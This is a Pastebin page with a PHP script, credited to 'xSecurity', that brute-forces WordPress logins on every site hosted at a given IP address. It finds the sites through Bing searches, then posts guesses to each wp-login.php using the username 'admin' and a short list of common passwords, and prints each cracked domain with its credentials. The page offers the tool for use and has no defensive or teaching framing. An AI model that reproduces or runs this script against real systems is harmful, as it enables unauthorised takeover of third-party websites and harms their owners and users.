Advertisement
Ribang

Brute Force All Wordpress On Server

Feb 4th, 2018
963
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.44 KB | None | 0 0
  1. <title>Brute Force All Wordpress On Server</title>
  2. <form method='POST'>
  3. <pre>
  4. Brute Force All WordPress On Server
  5. IP : <input type='text' name='ip' placeholder='IP Address'><input type='submit' name='start' value='Start Brute'>
  6. </pre>
  7. </form>
  8. <?
  9. /*
  10. * Coded By : xSecurity
  11. * Sec4ever.com
  12. * Greets to : b0x - DamaneDz - UzunDz - Asmar - Lov3rDNS - ZGaRT
  13. */
  14. @set_time_limit(0);
  15.  
  16. $ip = $_POST['ip'];
  17. $bing = "IP:+{$ip}+page_id=";
  18. $password = array('123123','123456','123321','admin','admin123','112233','332211');
  19. function check($url)
  20. {
  21. $url=(!eregi("http://www",$url))?str_replace("http://","http://www.",$url):$url;
  22. preg_match("#(.*?)\/[?]page_id=#",$url,$b0x);
  23. return $b0x[1]."/";
  24. }
  25. if($_POST['start'])
  26. {
  27. for($i=1;$i<=10+10;$i++)
  28. {
  29. $get = @file_get_contents("http://www.bing.com/search?q={$bing}&go=&qs=ds&filt=all&first=$i");
  30. preg_match_all('#(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)#siU',$get, $site);
  31. $sites = array_unique($site[2]);
  32. }
  33. foreach($sites as $webs)
  34. {
  35. foreach($password as $pass)
  36. {
  37. $domains = check($webs);
  38. //print $domains;
  39. print b0x($domains,$pass);
  40. }
  41. }
  42. }
  43. function b0x($domains,$pass)
  44. {
  45. $curl = curl_init();
  46. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  47. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  48. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./b0x.txt");
  49. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./b0x.txt");
  50. curl_setopt($curl,CURLOPT_URL, "{$domains}/wp-login.php");
  51. curl_setopt($curl,CURLOPT_POSTFIELDS, "log=admin&pwd={$pass}&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1");
  52. $brute = curl_exec($curl);
  53. if(eregi('upload.php', $brute))
  54. {
  55. print "<font face='Tahoma' size='2'>[+] Cracked Domian: {$domains} --> Username: <b>admin</b> | Password: <b>{$pass}</b></font><br>";
  56. }
  57. }
  58. print "<font face='Tahoma' size='2'><b>Coded By: xSecurity - Sec4ever.CoM</b></font>";
  59. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement